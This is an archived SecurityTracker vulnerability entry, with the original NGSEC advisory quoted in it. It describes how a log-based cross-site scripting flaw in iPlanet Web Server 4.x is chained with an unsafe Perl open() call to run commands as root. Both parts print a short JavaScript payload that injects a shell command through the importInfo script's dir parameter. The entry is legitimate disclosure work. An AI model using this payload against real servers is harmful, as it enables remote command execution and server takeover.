SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Sun ONE/iPlanet Web Server Vendors:   Sun
Sun iPlanet Web Server Cross-Site Scripting and Unsafe Perl Script open() Calls Let Remote Users Execute Commands on the Server
SecurityTracker Alert ID:  1005656
SecurityTracker URL:  http://securitytracker.com/id/1005656
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 19 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 4.* up to SP11
Description:   Two vulnerabilities were reported in Sun's iPlanet Web Server. A remote user can execute commands on the target server.

Next Generation Security Technologies issued an advisory warning that a remote user can exploit a combination of the two flaws to execute commands on the server, typically with root level privileges.

One flaw is an input validation flaw that permits cross-site scripting attacks. The other flaw is a series of unsafe open() function calls in the Admin Server Perl scripts.

To trigger the exploit, the administrator must review the log files for the web server.

In the first flaw, it is reported that the web server does not filter HTML code when writing to the log files. A remote user can create a specially crafted URL that will cause HTML code to be written to the log files. Then, when an administrator views the log files, arbitrary scripting code will be executed by the target administrator's browser. The code will originate from the site running the iPlanet software and will run in the security context of that site. As a result, the code will be able to access the target administrator's cookies (including authentication cookies) associated with the site, access data recently submitted by the target administrator via web form to the site, or take actions on the site acting as the administrator user.

The remote user can exploit this cross-site scripting flaw to cause the administrator's browser to call the vulnerable Admin Server Perl scripts and exploit the unsafe open() function calls. Because the administrator will already be logged in to the server (to view the log files), the Perl scripts can be invoked (they would otherwise require the administrator to log in before executing).

Some demonstration exploit code is provided:

<script>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</script>

A demonstration exploit script is available at:

http://www.ngsec.com/downloads/exploits/iplanet-ngxss.sh

For the original advisory, see:

http://www.ngsec.com/docs/advisories/NGSEC-2002-4.txt

Impact:   A remote user can cause the administrator's browser to execute arbitrary shell commands when viewing the log file.
Solution:   No solution was available at the time of this entry.

NGSEC indicates that you can upgrade to iPlanet v.6.* to avoid this vulnerability. According to the report, the cross-site scripting flaw was fixed in version 6.

Vendor URL:  wwws.sun.com/software/products/web_srvr/home_web_srvr.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (HP/UX), UNIX (Solaris - SunOS), UNIX (Tru64), Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Sun Issues Fix) Re: Sun iPlanet Web Server Cross-Site Scripting and Unsafe Perl Script open() Calls Let Remote Users Execute Commands on the Server
Sun has released a fix.



 Source Message Contents

Subject:  [VulnWatch] iPlanet WebServer, remote root compromise


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1




                   Next Generation Security Technologies
                          http://www.ngsec.com
                            Security Advisory


       Title:   iPlanet WebServer, remote root compromise
          ID:   NGSEC-2002-4
 Application:   iPlanet WebServer 4.* up to SP11
        Date:   11/19/2002
      Status:   Vendor contacted on 09/28/2002, (Sun Microsystems).
 Platform(s):   Unix & Windows OSs.
    Location:   http://www.ngsec.com/docs/advisories/NGSEC-2002-4.txt


Overview:
- ----------

Under certain circumstances an attacker can execute commands (usually
as root), using the combination of two security vulnerabilities on
iPlanet Web Server 4.* up to SP11 (NG-XSS).

These two vulnerabilities are:

  - Insecure open()s at Admin Server PERL scripts
  - Cross Site Scripting

The only need will be, through social skills, to have the Administrator
review the logs within iPlanet Admin Server.

This vulnerability can not be exploited on a 6.* version because XSS
was silently fixed in these releases.

Find a detailed vulnerability analysis of NG-XSS on iPlanet WebServers
in our WhitePaper "iPlanet NG-XSS Vulnerability Analysis" at:

       http://www.ngsec.com/ngresearch/ngwhitepapers/


Technical description:
- -----------------------

If we consider each vulnerability alone, we have no chance to execute
commands at the iPlanet Web Server since XSS payload is Browser Hijacking
and the vulnerable PERL script is protected by an authentication schema.

iPlanet Web Server suffers from a XSS vulnerability when the Administrator
reviews the error logs through iPlanet Admin Server. XSS triggers once
the Administrator has successfully logged on the Admin Server.

The trick is not to exploit the open() PERL vulnerability directly, but
use instead the XSS to redirect the Administrator's browser to the URL
that will cause the open() command injection.
Since he is already authenticated, we bypass the authentication schema.

We will use the following Javascript code:

<script>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</script>


Proof of vulnerability:
- ------------------------

Find an exploit for this vulnerability at:

       http://www.ngsec.com/ngresearch/ngadvisories/

There is a case study exploitation (sending the attacker an xterm) with
some screenshots, in the aboved mentioned WhitePaper.


Recommendations:
- -----------------
Avoid iPlanet's Admin Server usage, until Sun releases a patch for
these vulnerabilities. Alternatively upgrade to iPlanet v.6.*

This vulnerability could not have been exploited on a NGSecureWeb(r)
protected iPlanet Web Server.

Find more information on NGSecureWeb features at:

      http://www.ngsec.com/ngproducts/ngsw/

- --
More security advisories at: http://www.ngsec.com/ngresearch/ngadvisories/
PGP Key: http://www.ngsec.com/pgp/labs.asc

Copyright(c) 2002 NGSEC. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE92XIKKrwoKcQl8Y4RAuXSAJwNS9/YzjFxvB4ZZ3taRMCtoqdZ6ACfXO4z
SiYhxDlBjC01gcs9BabvSkc=
=3aXf
-----END PGP SIGNATURE-----




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC